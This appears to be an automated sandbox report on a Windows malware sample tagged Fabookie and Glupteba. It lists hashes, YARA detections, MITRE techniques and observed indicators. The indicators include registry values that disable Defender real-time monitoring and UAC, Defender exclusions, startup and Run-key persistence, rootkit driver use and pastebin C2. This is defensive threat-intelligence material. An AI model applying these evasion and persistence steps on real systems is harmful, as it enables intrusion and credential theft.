fabookie | ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1

Resubmissions

04-02-2024 20:50

240204-zmv5ysadh5 10

17-12-2023 22:34

231217-2hhp6sgbaq 10

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04-02-2024 20:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Size

735KB
MD5

9f5cb3a9a4053a53063a9da9afbf6273
SHA1

b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e
SHA256

ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1
SHA512

aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26
SSDEEP

12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA

Score

10^/10

fabookie glupteba discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/616-345-0x0000000003180000-0x00000000032AC000-memory.dmp	family_fabookie
behavioral1/memory/616-409-0x0000000003180000-0x00000000032AC000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 25 IoCs

resource	yara_rule
behavioral1/memory/1632-223-0x0000000002AA0000-0x000000000338B000-memory.dmp	family_glupteba
behavioral1/memory/1632-226-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1976-229-0x0000000002AA0000-0x000000000338B000-memory.dmp	family_glupteba
behavioral1/memory/1976-241-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1976-244-0x0000000002AA0000-0x000000000338B000-memory.dmp	family_glupteba
behavioral1/memory/2152-254-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2152-289-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1632-293-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-294-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1632-319-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2256-339-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2256-433-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-438-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-439-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-441-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-443-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-445-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-447-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-452-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-488-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-505-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-509-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-513-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-535-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2924-538-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Windows security bypass 2 TTPs 9 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d7zkODciX9qGiSBDVgCwciil.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
2216	bcdedit.exe
1084	bcdedit.exe
2292	bcdedit.exe
2068	bcdedit.exe
1028	bcdedit.exe
2612	bcdedit.exe
1892	bcdedit.exe
1604	bcdedit.exe
1456	bcdedit.exe
880	bcdedit.exe
548	bcdedit.exe
2436	bcdedit.exe
2296	bcdedit.exe
320	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1916	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hYOSTQl4ZOScEXVZWKHKCwiZ.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8YXs7RvOOQkwqy1nSy83K8Sh.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BZzQ9I2Ni051NtpKzTnuRpan.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SqwpGJIafzlOKpy3kmJwFobY.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puupUEpjUtVBmuvdcpU2wAvi.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CUodPs9aLdMNUZe9XRTnPy6w.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1DctMUglAZpdGJXsKibkyWDD.bat	CasPol.exe

Executes dropped EXE 18 IoCs

pid	Process
1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
1976	d7zkODciX9qGiSBDVgCwciil.exe
616	JG0VcbHAmHiysTLswUyQn41j.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
2924	csrss.exe
2820	patch.exe
2256	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
1992	injector.exe
1884	20JVE3uO8rUulGwiD48JppRS.exe
400	QSP1mZCKb50xeOQ0DG0q7HFV.exe
2284	tnmS1TzSKe9J8mB78miReTHx.exe
1584	Install.exe
1564	tnmS1TzSKe9J8mB78miReTHx.tmp
1772	Install.exe
1596	dsefix.exe
2056	windefender.exe
1188	windefender.exe
2680	RXpBNGY.exe

Loads dropped DLL 34 IoCs

pid	Process
2720	CasPol.exe
2720	CasPol.exe
2720	CasPol.exe
2720	CasPol.exe
2720	CasPol.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
860	Process not Found
2820	patch.exe
2820	patch.exe
2820	patch.exe
2820	patch.exe
2820	patch.exe
2924	csrss.exe
2720	CasPol.exe
1884	20JVE3uO8rUulGwiD48JppRS.exe
1884	20JVE3uO8rUulGwiD48JppRS.exe
1884	20JVE3uO8rUulGwiD48JppRS.exe
2720	CasPol.exe
2720	CasPol.exe
400	QSP1mZCKb50xeOQ0DG0q7HFV.exe
1884	20JVE3uO8rUulGwiD48JppRS.exe
2284	tnmS1TzSKe9J8mB78miReTHx.exe
1584	Install.exe
1584	Install.exe
1584	Install.exe
1584	Install.exe
1772	Install.exe
1772	Install.exe
1772	Install.exe
2820	patch.exe
2820	patch.exe
2820	patch.exe
2924	csrss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001931d-351.dat	upx
behavioral1/files/0x000500000001931d-350.dat	upx
behavioral1/memory/400-360-0x0000000000B60000-0x0000000001048000-memory.dmp	upx
behavioral1/files/0x000500000001931d-354.dat	upx
behavioral1/memory/400-436-0x0000000000B60000-0x0000000001048000-memory.dmp	upx
behavioral1/files/0x00050000000120d7-499.dat	upx
behavioral1/memory/2056-500-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1188-503-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2056-504-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1188-510-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1188-534-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d7zkODciX9qGiSBDVgCwciil.exe = "0"	d7zkODciX9qGiSBDVgCwciil.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast	Install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
7	pastebin.com

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	RXpBNGY.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	RXpBNGY.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	RXpBNGY.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2164 set thread context of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	d7zkODciX9qGiSBDVgCwciil.exe
File opened (read-only)	\??\VBoxMiniRdrDN	VNg2XgrhtLvzc6ZQLgmlPtMG.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\unins000.dat	tnmS1TzSKe9J8mB78miReTHx.tmp
File created	C:\Windows\Logs\CBS\CbsPersist_20240204205101.cab	makecab.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\bvgvHgqNgKCzXIKVFa.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	d7zkODciX9qGiSBDVgCwciil.exe
File created	C:\Windows\rss\csrss.exe	d7zkODciX9qGiSBDVgCwciil.exe
File created	C:\Windows\unins000.dat	tnmS1TzSKe9J8mB78miReTHx.tmp
File created	C:\Windows\is-QS4H9.tmp	tnmS1TzSKe9J8mB78miReTHx.tmp

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1172	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1624	schtasks.exe
2192	schtasks.exe
2084	schtasks.exe
2624	schtasks.exe
1956	schtasks.exe
1336	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	windefender.exe
